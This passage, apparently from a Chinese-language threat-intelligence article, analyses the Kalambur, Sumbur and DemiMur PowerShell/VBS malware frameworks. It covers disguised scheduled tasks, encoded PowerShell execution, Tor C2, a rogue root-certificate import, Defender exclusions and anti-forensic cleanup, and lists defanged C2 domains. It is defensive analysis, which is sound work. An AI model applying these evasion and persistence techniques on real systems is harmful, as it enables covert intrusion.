data-mpa-md-key="bullet-list" data-mpa-md-action-id="$id"><span leaf=""><span textstyle="" style="font-weight: bold;">计划任务</span>： 创建名为 WindowsUpdateCheck 的高频率计划任务，每 60 分钟触发一次 rata.vbs。</span></p></li></ul><p data-mpa-md-key="common" style="margin-bottom: 16px;margin-top: 16px;font-size: 16px;color: rgb(51, 51, 51);text-indent: 0px;text-align: center;"><span leaf="" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1620967741935484" data-w="1240" style="width: 553.74px;height: 89.73px;background-color: transparent;" src="https://wechat2rss.xlab.app/img-proxy/?k=ff45d227&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXL490vjwAZCzSQ8tCicic8TN0EyGpKqh9wTpjHibWcarZbtTqF7CDj5Yf2Nbr7gBqh6Yv8Qv3dPwkqQiaZYHMkeDSg08qcjd2ODUeo%2F640%3Fwx_fmt%3Dpng"/></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02t1twz"><span leaf="" style="">该 VBS 脚本经过 Base64 编码封装，真实意图是循环从 Onion 节点拉取并执行远程指令。</span></p><p data-mpa-md-key="heading-3" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;font-weight: bold;" data-mpa-md-action-id="mmxaa02t1ow"><span leaf="">2.4 防御规避与自清理</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02ti8i"><span leaf="" style="">脚本执行链中嵌入了密集的反取证操作：</span></p><ul style="list-style-type: disc;padding-left: 1.2em;color: rgb(37, 37, 37);width: fit-content;" class="list-paddingleft-1"><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="bullet-list" data-mpa-md-action-id="$id"><span leaf=""><span textstyle="" style="font-weight: bold;">无脚本化执行</span>：核心逻辑均通过 powershell -enc（Base64 加密命令）运行，规避静态特征扫描和命令行审计。</span></p></li></ul><ul style="list-style-type: disc;padding-left: 1.2em;color: rgb(37, 37, 37);width: fit-content;" class="list-paddingleft-1"><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="bullet-list" data-mpa-md-action-id="$id"><span leaf=""><span textstyle="" style="font-weight: bold;">DLL注入与Tor安装</span>：脚本请求下载 hid.dll 并将其放置在C:\Program Files\Common Files\microsoft shared\ink\目录下，用于 DLL 注入和 TOR 浏览器安装。</span></p></li></ul><p data-mpa-md-key="common" style="margin-bottom: 16px;margin-top: 16px;font-size: 16px;color: rgb(51, 51, 51);text-indent: 0px;text-align: center;"><span leaf="" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.3021148036253776" data-w="1324" style="width: 553.74px;height: 167.27px;background-color: transparent;" src="https://wechat2rss.xlab.app/img-proxy/?k=d72b032c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXKGa8O9kfDcf4gIJmA6nfK0uADiay1mnQnxXo1McQglRib2FubBMuLLOQ3vrkPPnBkh5fibgDEXTJLgnU2xh3mWpEqf8dZDibMmUdM%2F640%3Fwx_fmt%3Dpng"/></span></p><ul style="list-style-type: disc;padding-left: 1.2em;color: rgb(37, 37, 37);width: fit-content;" class="list-paddingleft-1"><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="bullet-list" data-mpa-md-action-id="$id"><span leaf=""><span textstyle="" style="font-weight: bold;">自我清理</span>：Check-Led 函数配合 sleep 延时，在攻击各阶段完成后强制删除 C:\Windows\Temp\ittem-*.exe 以及各类中间 VBS 脚本，大幅缩短了受害者侧的取证时间窗口。</span></p></li></ul><div data-mpa-md-key="heading-2" style="display: flex;"><div style="display:flex;align-items:flex-start;"><p data-mpa-md-content="t" style="font-weight: 600;font-size: 17px;color: rgb(37, 37, 37);line-height: 28px;flex: 1 1 0%;text-align: left;" data-mpa-md-action-id="mmxaa02t24bl"><span leaf="">3. Sumbur</span></p></div></div><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02tev3"><span leaf="" style="">Sumbur 作为该模块化PowerShell攻击框架的迭代版本，在继承了前代Kalambur核心逻辑的基础上，展现了显著的隐蔽性增强与技战术（TTPs）优化。该框架通过多级 VBScript 封装、Tor 匿名网络通信以及对 Windows 原生服务的武器化利用，旨在受害内网中构建一条持久且难以溯源的隐蔽控制链。</span></p><p data-mpa-md-key="heading-3" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;font-weight: bold;" data-mpa-md-action-id="mmxaa02tzv5"><span leaf="">3.1 Kalambur与Sumbur核心差异对比</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02t192t"><span leaf="" style="">下表概括了两代框架在关键技战术（TTPs）上的演进：</span></p><table style="width:511px;"><tbody><tr><td data-colwidth="129"></td><td data-colwidth="191"><div><p data-mpa-md-key="text" style="font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mmxa3kl61qeh" data-mpa-action-id="mmxa3kl716px" data-pm-slice="0 0 []"><span leaf=""><span textstyle="" style="font-size: 16px;color: rgb(51, 51, 51);font-weight: bold;">Kalambur</span></span></p></div></td><td data-colwidth="191"><div><p data-mpa-md-key="text" style="font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mmxa3owk5qk" data-mpa-action-id="mmxa3owl1kry" data-pm-slice="0 0 []"><span leaf=""><span textstyle="" style="font-size: 16px;color: rgb(51, 51, 51);font-weight: bold;">Sumbur</span></span></p></div></td></tr><tr><td data-colwidth="129"><div><p data-mpa-md-key="text" style="font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mmxa40om3a5" data-mpa-action-id="mmxa40omzrh" data-pm-slice="0 0 []"><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;">伪装路径</span></p></div></td><td data-colwidth="191"><p><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" mpa-font-style="mmxa6xrk4u7" data-mpa-action-id="mmxa6xrp237u" data-pm-slice="0 0 []">%PUBLIC%\Windows Update</span></p></td><td data-colwidth="191"><p><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" mpa-font-style="mmxa78fn1r0d" data-mpa-action-id="mmxa78fu4ss" data-pm-slice="0 0 []">%PUBLIC%\Edge Update Manager</span></p></td></tr><tr><td data-colwidth="129"><div><p data-mpa-md-key="text" style="font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mmxa499z17la" data-mpa-action-id="mmxa49a0fin" data-pm-slice="0 0 []"><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;">持久化名称</span></p></div></td><td data-colwidth="191"><div style="padding: 0 8px;" data-mpa-md-root="t" data-mpa-uuid="1b45f7baa2d01eb8541e9d7ce0489590" data-mpa-apply-md="t" data-mpa-action-id="mmx9s5uc1q5j" data-pm-slice="0 0 []"><p data-mpa-md-key="text" style="font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mmxa7c501xyi" data-mpa-action-id="mmxa7c501cqu" data-pm-slice="0 0 []"><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;">WindowsUpdateCheck</span></p></div></td><td data-colwidth="191"><p><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" mpa-font-style="mmxa7s811np" data-mpa-action-id="mmxa7s881zsl" data-pm-slice="0 0 []">MicrosoftEdgeUpdateTaskMachineCore</span></p></td></tr><tr><td data-colwidth="129"><div><p data-mpa-md-key="text" style="font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mmxa4c593qg" data-mpa-action-id="mmxa4c59739" data-pm-slice="0 0 []"><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;">C2域名</span></p></div></td><td data-colwidth="191"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;" data-mpa-action-id="mmxa8jep204x" data-pm-slice="0 0 []">kalambur[.]net</span></span></p></td><td data-colwidth="191"><p data-mpa-action-id="mmxa8q8e1k2o"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;">sumbur[.]net</span></span></p></td></tr><tr><td data-colwidth="129"><div><p data-mpa-md-key="text" style="font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mmxa4gjg4nk" data-mpa-action-id="mmxa4gjg20d4" data-pm-slice="0 0 []"><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;">传输安全性</span></p></div></td><td data-colwidth="191"><p><span style="font-size:11.0pt;font-family:DengXian;color:black;"><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;">明文</span><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;"> HTTP/PowerShell </span><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;">请求</span></span></p></td><td data-colwidth="191"><p><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" mpa-font-style="mmxa8zbz171a" data-mpa-action-id="mmxa8zc71vmc" data-pm-slice="0 0 []">Basic Authorization</span></p></td></tr><tr><td data-colwidth="129"><div><p data-mpa-md-key="text" style="font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mmxa4qf815j5" data-mpa-action-id="mmxa4qf8kda" data-pm-slice="0 0 []"><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;">组件完整性</span></p></div></td><td data-colwidth="191"><div><p data-mpa-md-key="text" style="font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mmxa5nuizc9" data-mpa-action-id="mmxa5nuilhc" data-pm-slice="0 0 []"><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;">直接解压WindowsUpdate.zip</span></p></div></td><td data-colwidth="191"><div><p data-mpa-md-key="text" style="font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mmxa58i6h6s" data-mpa-action-id="mmxa58i6xpx" data-pm-slice="0 0 []"><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;">MD5校验</span></p></div></td></tr><tr><td data-colwidth="129"><div><p data-mpa-md-key="text" style="font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mmxa4y5mi6w" data-mpa-action-id="mmxa4y5mpv8" data-pm-slice="0 0 []"><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;">通信链路</span></p></div></td><td data-colwidth="191"><div><p data-mpa-md-key="text" style="font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mmxa5edg5oq" data-mpa-action-id="mmxa5edgxh0" data-pm-slice="0 0 []"><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;">静态Onion节点</span></p></div></td><td data-colwidth="191"><div><p data-mpa-md-key="text" style="font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mmxa54ah1e6o" data-mpa-action-id="mmxa54ah234o" data-pm-slice="0 0 []"><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;">动态配置</span></p></div></td></tr></tbody></table><p data-mpa-md-key="heading-3" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;font-weight: bold;" data-mpa-md-action-id="mmxaa02uu1q"><span leaf="" style="">3.2 访问控制</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02ulik"><span leaf="" style="">Sumbur 在载荷下发阶段引入了基于基础认证（Basic Authorization）的访问控制。在执行 Check-Cold 与 Change-Ion 函数请求远程资源时，请求头中必须包含硬编码的 Base64 凭据。</span></p><p data-mpa-md-key="common" style="margin-bottom: 16px;margin-top: 16px;font-size: 16px;color: rgb(51, 51, 51);text-indent: 0px;text-align: center;"><span leaf="" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.2212486308871851" data-w="913" style="width: 553.74px;height: 122.47px;background-color: transparent;" src="https://wechat2rss.xlab.app/img-proxy/?k=caf1e74e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXIeQLvW1OCxc2DYCaPahqyQgbkXzMhiawCfeBEh4xZWX8WFvUhyJjkuzILeBnCtt0qVxHeZibTNEOvhDbEu8iagprkEbkCGDcZTvw%2F640%3Fwx_fmt%3Dpng"/></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02u1y1w"><span leaf="" style="">这一改动是攻击者 OpSec意识提升的直接体现。通过校验 HTTP 报头，C2 服务端可识别并过滤掉来自自动化分析沙箱或安全研究人员的被动扫描请求。针对未授权访问，服务端通常返回伪造内容或拒绝连接，从而实现“非靶标不投送”的精准打击策略，极大地增加了研究人员获取核心载荷的难度。</span></p><p data-mpa-md-key="heading-3" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;font-weight: bold;" data-mpa-md-action-id="mmxaa02u14py"><span leaf="">3.3 模块化管理</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02u123"><span leaf="" style="">相较于 Kalambur 较为僵化的执行逻辑，Sumbur 引入了更灵活的模块管理功能：</span></p><ul style="list-style-type: disc;padding-left: 1.2em;color: rgb(37, 37, 37);width: fit-content;" class="list-paddingleft-1"><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="bullet-list" data-mpa-md-action-id="$id"><span leaf=""><span textstyle="" style="font-weight: bold;">Change-Ion 机制</span>：该机制赋予了框架对本地 Tor 代理服务的全生命周期管理能力。</span></p></li></ul><p data-mpa-md-key="common" style="margin-bottom: 16px;margin-top: 16px;font-size: 16px;color: rgb(51, 51, 51);text-indent: 0px;text-align: center;"><span leaf="" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.3395604395604396" data-w="910" style="width: 553.74px;height: 188px;background-color: transparent;" src="https://wechat2rss.xlab.app/img-proxy/?k=ee36c949&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXI9CRStvYqURibhon5Y0Pqzibfl0CwotT8F7HRNqx5iaMHneWRWiaDVcg8s5awXZrYkicXGAbzQyg0jibrfk8FWP4icjffSOSnS31yWDE%2F640%3Fwx_fmt%3Dpng"/></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02umpj"><span leaf="">攻击者可根据 C2 指令随时关停 tor 进程，远程拉取并重写最新的 lib 配置文件后再行重启。这种“配置旋转”能力确保了在特定出口节点被封禁时，通信链路能迅速完成热更新。</span></p><ul style="list-style-type: disc;padding-left: 1.2em;color: rgb(37, 37, 37);width: fit-content;" class="list-paddingleft-1"><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="bullet-list" data-mpa-md-action-id="$id"><span leaf=""><span textstyle="" style="font-weight: bold;">分阶段下载与清理</span>：Sumbur对 Get-Led 函数进行了细化，实现了对 ftara.log、ion.log 等中间状态日志的精准清理。</span></p></li></ul><p data-mpa-md-key="common" style="margin-bottom: 16px;margin-top: 16px;font-size: 16px;color: rgb(51, 51, 51);text-indent: 0px;text-align: center;"><span leaf="" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.862934362934363" data-w="518" style="width: 517.94px;height: 446.95px;background-color: transparent;" src="https://wechat2rss.xlab.app/img-proxy/?k=9b928dd8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXJko4nRXYQGpKjH1LiaLhib5tGZSUkNB7N0KCJiaSYPibKstdV5LggtgRGicbF4HEYzyBGJQD9iaHiaH4MBoWVKJaTzFbH2Bqpmmhf1QU%2F640%3Fwx_fmt%3Dpng"/></span></p><p data-mpa-md-key="heading-3" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;font-weight: bold;" data-mpa-md-action-id="mmxaa02u59m"><span leaf="">3.4 防御规避</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02u4un"><span leaf="" style="">鉴于企业环境中浏览器及其更新程序的高频活动特征，Sumbur 通过模仿Edge的更新逻辑，将恶意 VBS 脚本驻留在模仿官方更新目录的路径下，利用大量的合法系统日志掩盖其异常 IO 活动，显著降低了行为熵值的异常凸显。</span></p><ul style="list-style-type: disc;padding-left: 1.2em;color: rgb(37, 37, 37);width: fit-content;" class="list-paddingleft-1"><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="bullet-list" data-mpa-md-action-id="$id"><span leaf=""><span textstyle="" style="font-weight: bold;">任务调度优化</span>：计划任务频率从每 60 分钟 (Kalambur) 修改为特定的每4小时(HOURLY /MO 4)执行一次。</span></p></li></ul><p data-mpa-md-key="common" style="margin-bottom: 16px;margin-top: 16px;font-size: 16px;color: rgb(51, 51, 51);text-indent: 0px;text-align: center;"><span leaf="" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.027097902097902096" data-w="1144" style="width: 553.74px;height: 15px;background-color: transparent;" src="https://wechat2rss.xlab.app/img-proxy/?k=ce11f901&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXIbxDI1bianjgibZD0JRkCJSniadFSs2ppF7AbZBZHOJaNvX0lQtnfY6UVfCLpTt5Ff3bpPxmW4Pom1FzhNDEDbibvazPfyoia16oOY%2F640%3Fwx_fmt%3Dpng"/></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02uzn1"><span leaf="" style="">这种调整策略通过精确模拟官方软件的更新周期，规避基于行为序列分析的启发式检测机制。</span></p><div data-mpa-md-key="heading-2" style="display: flex;"><div style="display:flex;align-items:flex-start;"><p data-mpa-md-content="t" style="font-weight: 600;font-size: 17px;color: rgb(37, 37, 37);line-height: 28px;flex: 1 1 0%;text-align: left;" data-mpa-md-action-id="mmxaa02ul7j"><span leaf="">4 DemiMur</span></p></div></div><p data-mpa-md-key="heading-3" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;font-weight: bold;" data-mpa-md-action-id="mmxaa02u554"><span leaf="">4.1 信任链篡改</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02vvtq"><span leaf="" style="">该攻击活动的核心战术在于通过信任链篡改实现长效的防御规避。攻击者利用该模块将伪造的DemiMurCA.crt根证书强制导入操作系统的受信任根证书颁发机构存储区，在执行后续脚本时，Windows 则会自动验证签名块的合法性并判定其为“受信任的”。</span></p><p data-mpa-md-key="common" style="margin-bottom: 16px;margin-top: 16px;font-size: 16px;color: rgb(51, 51, 51);text-indent: 0px;text-align: center;"><span leaf="" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.33666666666666667" data-w="600" style="width: 553.74px;height: 186.4px;background-color: transparent;" src="https://wechat2rss.xlab.app/img-proxy/?k=7b74745c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXLlc0icI8fZrt8XX4xpJicczqu9Kl3ks8ubYSGmC56aEtPJDFHQdZg6mOkcgXdJ8YQdia1POITIMvibHGQibhGK0eLFjpCOPicSRh8MQ%2F640%3Fwx_fmt%3Dpng"/></span></p><ul style="list-style-type: disc;padding-left: 1.2em;color: rgb(37, 37, 37);width: fit-content;" class="list-paddingleft-1"><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="bullet-list" data-mpa-md-action-id="$id"><span leaf=""><span textstyle="" style="font-weight: bold;">权限获取与证书注入</span>：脚本通过调用系统原生指令 Import-Certificate，将证书精准植入本地计算机的根存储路径（Cert:\LocalMachine\Root）。</span></p></li></ul><p data-mpa-md-key="common" style="margin-bottom: 16px;margin-top: 16px;font-size: 16px;color: rgb(51, 51, 51);text-indent: 0px;text-align: center;"><span leaf="" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.8134920634920635" data-w="504" style="width: 504.01px;height: 410.01px;background-color: transparent;" src="https://wechat2rss.xlab.app/img-proxy/?k=8dc2131e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXIs4OcGG02D8LdlHSJEialHS24GibdUY8oKmia6ibpOOUII0erzgx0CIcsx3vicdC76zoBZmdWjpd1R7rOCvy5qNFjGlNqusHSGicmfI%2F640%3Fwx_fmt%3Dpng"/></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02v96f"><span leaf="" style="">此操作从操作系统底层重构信任链，为后续的所有恶意载荷、加密流量及伪装站点建立持续的信任基础，确保无感绕过系统的合规性校验。</span></p><ul style="list-style-type: disc;padding-left: 1.2em;color: rgb(37, 37, 37);width: fit-content;" class="list-paddingleft-1"><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="bullet-list" data-mpa-md-action-id="$id"><span leaf=""><span textstyle="" style="font-weight: bold;">载荷加载与自清理</span>：证书注入完成后，脚本立即触发自清理机制。在强制清理残留.crt文件的同时，投放二段压缩载荷 dmf.zip。</span></p></li></ul><p data-mpa-md-key="common" style="margin-bottom: 16px;margin-top: 16px;font-size: 16px;color: rgb(51, 51, 51);text-indent: 0px;text-align: center;"><span leaf="" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.28044280442804426" data-w="542" style="width: 541.94px;height: 151.98px;background-color: transparent;" src="https://wechat2rss.xlab.app/img-proxy/?k=31cc8c77&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXIVYGstMTImUHlxSwR8WLPgbZ3Fx0n32PRSA0yNxFB19iagk7dmFcYAmKDwZtku9xAxic1naEl0UstCXtJjntXyDkFYPn9BmIribM%2F640%3Fwx_fmt%3Dpng"/></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02vecc"><span leaf="">通过解压并执行核心模块DemiMurFunc.exe，脚本随后会同步执行自删除逻辑（清理 DemiMur.exe），实现从“投递器”向“功能组件”的过渡，从而最大限度压缩数字取证的响应窗口。</span></p><p data-mpa-md-key="heading-3" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;font-weight: bold;" data-mpa-md-action-id="mmxaa02vkhg"><span leaf="">4.2 目录排除</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02v1v2r"><span leaf="" style="">利用 PowerShell 原生指令 Add-MpPreference 强制修改 Microsoft Defender 的扫描配置。将C盘根目录、TEMP临时目录以及多个 PowerShell 核心模块路径列入排除名单。</span></p><p data-mpa-md-key="common" style="margin-bottom: 16px;margin-top: 16px;font-size: 16px;color: rgb(51, 51, 51);text-indent: 0px;text-align: center;"><span leaf="" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1327713382507903" data-w="949" style="width: 553.74px;height: 73.53px;background-color: transparent;" src="https://wechat2rss.xlab.app/img-proxy/?k=ca22402b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXIP1y5YriaAREFaeElEiapfzwMLO6Yux2BMZyeUFQryBFgdCVSLWz9eBibf0HB6U1bJaNWg3PNBv9UWfnjLzicpNOGlyeLChumAb18%2F640%3Fwx_fmt%3Dpng"/></span></p><ul style="list-style-type: disc;padding-left: 1.2em;color: rgb(37, 37, 37);width: fit-content;" class="list-paddingleft-1"><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="bullet-list" data-mpa-md-action-id="$id"><span leaf="">防御能力削弱：将整个系统盘设为白名单是极端的防御对抗手段，确保后续投送的恶意二进制文件在落地执行时不会触发实时监控警报，为攻击者在 %PUBLIC% 等目录下部署脚本提供“安全环境”。</span></p></li></ul><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02v15xa"><span leaf="" style="">在成功削弱系统防御后，结合Tambur中使用的反向加密隧道以及kalambur中的桌面控制权获取，构建了完整的隐蔽渗透链路。</span></p><div data-mpa-md-key="heading-1" style="margin-bottom: 16px;margin-top: 16px;"><div style="width: 100%;display: flex;justify-content: center;align-items: center;justify-content: flex-start;" data-mid=""><div 